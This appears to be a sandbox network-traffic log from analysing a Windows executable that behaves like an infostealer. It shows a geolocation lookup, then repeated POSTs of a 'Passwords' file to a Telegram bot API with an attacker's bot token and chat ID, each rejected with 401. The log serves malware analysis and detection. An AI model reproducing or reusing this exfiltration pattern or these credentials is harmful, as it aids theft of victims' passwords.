                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: a6 fd 66 bf 1c fd 9a 47 e0 b8 3b d1 b5 9f 4b 19 b3 18 cd bb b3 2b 28 74 12 ae 8e cd dc 22 47 a3 94 6c 02 fa c1 e7 65 53 89 14 3a f5 e4 80 21 fb 2c c4 a5 4f a4 7c 9c 83 90 bc 3e eb 8e 18 21 61 33 9c 94 6b fe ee a4 44 6d a4 ea 77 39 69 b7 9c a6 8f 3b f7 f9 3b 37 49 41 b2 12 2b 73 00 4b b1 8b 5f bd d4 66 0d e4 94 b8 e9 13 e1 d8 a9 e8 4b d2 08 90 b3 c8 1e 20 6d 35 13 af e7 c7 2e 93 59 c7 72 62 d5 88 55 7e 5b 7c 17 af b0 a5 13 2e fe 40 c9 09 7e 3a e0 3d d8 ee df 66 5c 24 c7 5b f1 61 c7 15 65 ac 2e 73 c5 d2 0b 71 94 26 4f 28 44 c4 ea 7d 45 c1 f4 95 de b3 c7 e2 31 5c b1 d5 05 84 c1 0e 58 8b 34 d7 68 ce 06 33 29 57 1b 45 1d 84 96 a6 bd 29 e7 92 37 11 c3 93 55 14 0f d6 e0 7d 06 1d c2 b0 d7 61 95 40 52 b6 26 cc 95 d7 ae 63 93 46 40 4b cb 21 c1 de 21 f3 84 6b d4 1c
                                                                                                          Data Ascii: fG;K+(t"GleS:!,O|>!a3kDmw9i;;7IA+sK_fK m5.YrbU~[|.@~:=f\$[ae.sq&O(D}E1\X4h3)WE)7U}a@R&cF@K!!k
                                                                                                          2025-01-11 02:05:26 UTC1390INData Raw: 89 d2 76 f5 a3 1c b1 f2 72 5a c8 2a 29 96 68 66 6e 40 0a 64 8c 58 cf 54 6e e4 95 f0 ab c8 93 1d 82 00 9a 92 6c 05 9a 58 dd 6e ec 54 e4 17 24 b4 ca b7 1e 08 bd 86 44 a5 1b 5d 0c cb f3 05 06 83 5f 90 4b 0f 9a 97 52 64 36 0d 52 d1 c5 46 db 10 ae 2b ec 57 a5 60 1a 49 f9 25 94 e1 ed c0 e8 9f f5 ce 77 02 b3 0d 1d 2e 2c 4d 3e 2b 6b 76 0c 3c f7 ba d3 dd 61 c9 f3 9d 01 ad 39 a6 cd 79 0d ff d6 0d de 8b b3 47 e7 75 87 4d f7 36 b9 50 e5 3b 78 56 21 c2 12 78 e7 e7 d5 93 b6 73 5b 60 27 b6 9d 95 fa 2a 4e 2e 20 4d 89 49 72 2c 27 02 0b cf a3 37 54 a5 51 76 92 50 df ce b5 42 42 5e 8d 4e 61 4f 15 c2 bf a5 92 af 5f 1e 9a 4e 7b a5 71 a3 fa 0e 1f 28 83 19 ef 97 d8 1a 41 5c c1 b6 b0 aa c6 c2 ac 08 89 7a a6 fa 57 ef 4c 04 cb f5 61 89 b2 9b ac a8 f5 f3 4e 5d 9d 63 f9 fc 47 a2 45
                                                                                                          Data Ascii: vrZ*)hfn@dXTnlXnT$D]_KRd6RF+W`I%w.,M>+kv<a9yGuM6P;xV!xs[`'*N. MIr,'7TQvPBB^NaO_N{q(A\zWLaN]cGE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49711 | 104.21.80.1 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:29 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-11 02:05:29 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:05:29 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1875918
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoFHZwgFB%2FU9QcPXyGEs%2FevgDALndS9LB84FWJSXX0WzJkGiZILLBLesj6wF9hr7Ls058yr8bK2nWUaly1iktvy32kD55Z2nBmNBNYNAsJAqGHLbtLzLRjpnoHs1KwefNRdrA4g2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 9001579359387d0e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1898&rtt_var=892&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1114503&cwnd=244&unsent_bytes=0&cid=06d0327c87b961ab&ts=160&x=0"
2025-01-11 02:05:29 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49712 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:35 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd31ba864dec1b
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-11 02:05:35 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 61 38 36 34 64 65 63 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd31ba864dec1bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:05:37 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:05:37 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:05:37 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49714 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:41 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd31feab93e593
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-11 02:05:41 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 65 61 62 39 33 65 35 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd31feab93e593Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:05:41 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:05:41 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:05:41 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49716 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:45 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd322ad5683121
Host: api.telegram.org
Content-Length: 1090
2025-01-11 02:05:45 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 61 64 35 36 38 33 31 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd322ad5683121Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:05:45 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:05:45 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:05:45 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49720 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:51 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd327b8ca4e039
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2025-01-11 02:05:51 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 62 38 63 61 34 65 30 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd327b8ca4e039Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:05:52 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:05:51 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:05:52 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49722 | 149.154.167.220 | 443 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:05:54 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd329c1e4798fc
Host: api.telegram.org
Content-Length: 1090
2025-01-11 02:05:54 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 63 31 65 34 37 39 38 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: --===============8dd329c1e4798fcContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 02:05:54 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
Server: nginx/1.18.0
Date: Sat, 11 Jan 2025 02:05:54 GMT
Content-Type: application/json
Content-Length: 58
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:05:54 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 8
Source IP: 192.168.2.10    Source Port: 49725
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:02 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd32f4decf3f7a
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:02 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 34 64 65 63 66 33 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd32f4decf3f7a
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:02 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:02 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:02 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 9
Source IP: 192.168.2.10    Source Port: 49728
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:12 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd336aba261beb
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:12 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 61 62 61 32 36 31 62 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd336aba261beb
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:12 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:12 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:12 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 10
Source IP: 192.168.2.10    Source Port: 49730
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:15 UTC | 294 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd3397358e49f3
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-11 02:06:15 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 37 33 35 38 65 34 39 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
    Data Ascii:
    --===============8dd3397358e49f3
    Content-Disposition: form-data; name="document"; filename="Userdata.txt"
    Content-Type: application/x-ms-dos-executable

    ************************************************************
    *
2025-01-11 02:06:15 UTC | 347 | IN | HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 11 Jan 2025 02:06:15 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 02:06:15 UTC | 58 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
    Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


Session ID: 11
Source IP: 192.168.2.10    Source Port: 49732
Destination IP: 149.154.167.220    Destination Port: 443
PID: 8156    Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:06:17 UTC | 270 | OUT | POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd33b140535537
    Host: api.telegram.org
    Content-Length: 1090
